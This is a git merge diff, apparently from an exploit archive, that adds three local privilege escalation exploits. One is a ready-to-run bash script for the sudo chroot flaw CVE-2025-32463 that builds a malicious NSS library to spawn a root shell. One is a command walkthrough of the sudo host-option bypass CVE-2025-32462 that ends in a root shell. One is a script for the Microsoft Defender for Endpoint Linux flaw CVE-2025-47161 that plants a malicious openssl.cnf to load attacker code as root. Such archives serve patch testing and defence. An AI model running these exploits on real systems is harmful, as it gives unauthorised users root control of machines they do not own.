Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/linux/local/52352.txt

@@ -0,0 +1,98 @@
+Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation
+Google Dork: not aplicable
+Date: Mon, 30 Jun 2025
+Exploit Author: Stratascale
+Vendor Homepage:https://salsa.debian.org/sudo-team/sudo
+Software Link:
+Version: Sudo versions 1.9.14 to 1.9.17 inclusive
+Tested on: Kali Rolling 2025-7-3
+CVE : CVE-2025-32463
+
+*Version running today in Kali:*
+https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/
+
+*Background*
+
+An attacker can leverage sudo's -R (--chroot) option to run
+arbitrary commands as root, even if they are not listed in the
+sudoers file.
+
+Sudo versions affected:
+
+    Sudo versions 1.9.14 to 1.9.17 inclusive are affected.
+
+CVE ID:
+
+    This vulnerability has been assigned CVE-2025-32463 in the
+    Common Vulnerabilities and Exposures database.
+
+Details:
+
+    Sudo's -R (--chroot) option is intended to allow the user to
+    run a command with a user-selected root directory if the sudoers
+    file allows it.  A change was made in sudo 1.9.14 to resolve
+    paths via chroot() using the user-specified root directory while
+    the sudoers file was still being evaluated.  It is possible for
+    an attacker to trick sudo into loading an arbitrary shared
+    library by creating an /etc/nsswitch.conf file under the
+    user-specified root directory.
+
+    The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
+    and the chroot feature has been marked as deprecated.  It will
+    be removed entirely in a future sudo release.  Because of the
+    way sudo resolves commands, supporting a user-specified chroot
+    directory is error-prone and this feature does not appear to
+    be widely used.
+
+    A more detailed description of the bug and its effects can be
+    found in the Stratascale advisory:
+    https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
+
+Impact:
+
+    On systems that support /etc/nsswitch.conf a user may be able
+    to run arbitrary commands as root.
+
+*Exploit:*
+
+*Verify the sudo version running: sudo --versionIf is vulnerable, copy and
+paste the following code and run it.*
+*----------------------*
+#!/bin/bash
+# sudo-chwoot.sh – PoC CVE-2025-32463
+set -e
+
+STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
+cd "$STAGE"
+
+# 1. NSS library
+cat > woot1337.c <<'EOF'
+#include <stdlib.h>
+#include <unistd.h>
+
+__attribute__((constructor))
+void woot(void) {
+    setreuid(0,0);          /* change to UID 0 */
+    setregid(0,0);          /* change  to GID 0 */
+    chdir("/");             /* exit from chroot */
+    execl("/bin/bash","/bin/bash",NULL); /* root shell */
+}
+EOF
+
+# 2. Mini chroot with toxic nsswitch.conf
+mkdir -p woot/etc libnss_
+echo "passwd: /woot1337" > woot/etc/nsswitch.conf
+cp /etc/group woot/etc            # make getgrnam() not fail
+
+# 3. compile libnss_
+gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
+
+echo "[*] Running exploit…"
+sudo -R woot woot                 # (-R <dir> <cmd>)
+                                   # • the first “woot” is chroot
+                                   # • the second “woot” is and inexistent
+command
+                                   #   (only needs resolve the user)
+
+rm -rf "$STAGE"
+*----------------------*

exploits/linux/local/52354.txt

@@ -0,0 +1,60 @@
+# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege
+# Date: 2025-06-30
+# Exploit Author: Rich Mirch
+# Vendor Homepage: https://www.sudo.ws
+# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz
+# Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32
+# Fixed in: 1.9.17p1
+# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any
+# Blog:
+https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host
+# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo
+1.9.13p2
+# CVE : CVE-2025-32462
+#
+No exploit is required. Executing a sudo or sudoedit command with the host
+option referencing an unrelated remote host rule causes Sudo to treat the
+rule as valid for the local system. As a result, any command allowed by the
+remote host rule can be executed on the local machine.
+
+Example /etc/sudoers file using the Host_Alias directive. The lowpriv user
+is allowed to execute all commands (full root) on dev.test.local,
+ci.test.local, but not prod.test.local.
+
+Host_Alias     SERVERS        = prod.test.local, dev.test.local
+Host_Alias     PROD           = prod.test.local
+lowpriv          SERVERS, !PROD = NOPASSWD:ALL
+lowpriv           ci.test.local  = NOPASSWD:ALL
+
+Even though the prod.test.local server is explicitly denied for the lowpriv
+user, root access is achieved by specifying the host option for the
+dev.test.local or ci.test.local servers.
+
+Example
+
+Show that lowpriv is not allowed to execute sudo on the prod server.
+
+lowpriv@prod:~$ id
+uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
+lowpriv@prod:~$ sudo -l
+[sudo] password for lowpriv:
+Sorry, user lowpriv may not run sudo on prod.
+
+List the host rules for the dev.test.local server.
+
+lowpriv@prod:~$ sudo -l -h dev.test.local
+Matching Defaults entries for lowpriv on dev:
+    env_reset, mail_badpass,
+secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
+use_pty
+
+User lowpriv may run the following commands on dev:
+    (root) NOPASSWD: ALL
+
+Execute a root shell on prod.test.local by specifying the -h dev.test.local
+option.
+
+lowpriv@prod:~$ sudo -h dev.test.local -i
+sudo: a remote host may only be specified when listing privileges.
+root@prod:~# id
+uid=0(root) gid=0(root) groups=0(root)

exploits/multiple/local/52355.txt

@@ -0,0 +1,78 @@
+#!/bin/bash
+# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
+# Date: 2025-05-27
+# Exploit Author: Rich Mirch
+# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
+# Software Link:
+https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
+# Versions:
+# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
+# Vulnerable Feb-2025 Build: 101.24122.0008  20.124112.0008.0
+# Vulnerable Feb-2025 Build: 101.24112.0003  30.124112.0003.0
+# Vulnerable Jan-2025 Build: 101.24112.0001   30.124112.0001.0
+# Vulnerable Jan-2025 Build: 101.24102.0000  30.124102.0000.0
+#
+# Vendor Advisory:
+https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
+# Blog: http://stratascale.com/vulnerability-alert-cve202547161
+# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
+# CVE : CVE-2025-47161
+#
+echo "MDE Version: $(mdatp version)"
+
+# stage
+cat >mde-exp.c<<EOF
+/*
+* Build procedure:
+* gcc -fPIC -o woot.o -Wall -c woot.c
+* gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
+*/
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/stat.h>
+
+void woot(){
+    // for manual testing
+    if(isatty(STDERR_FILENO)) {
+        fprintf(stderr,"Woot!\n");
+    }
+    system("ps -ef > /woot.txt");
+    sleep(3000000);
+}
+
+EOF
+
+# build exploit
+gcc -fPIC -o woot.o -Wall -c mde-exp.c
+gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
+
+mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/
+
+cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf
+<<EOF
+# Malicious openssl.cnf
+openssl_conf = openssl_init
+[openssl_init]
+engines = engine_section
+
+[engine_section]
+woot = woot_section
+
+[woot_section]
+engine_id = woot
+dynamic_path = /tmp/woot.so
+init = 0
+EOF
+
+echo "Checking every 15 seconds for /woot.txt"
+while true
+do
+    if [[ -f /woot.txt ]]
+    then
+        echo "WOOT - /woot.txt exists"
+    ls -ld /woot.txt
+    exit
+    fi
+    sleep 15
+done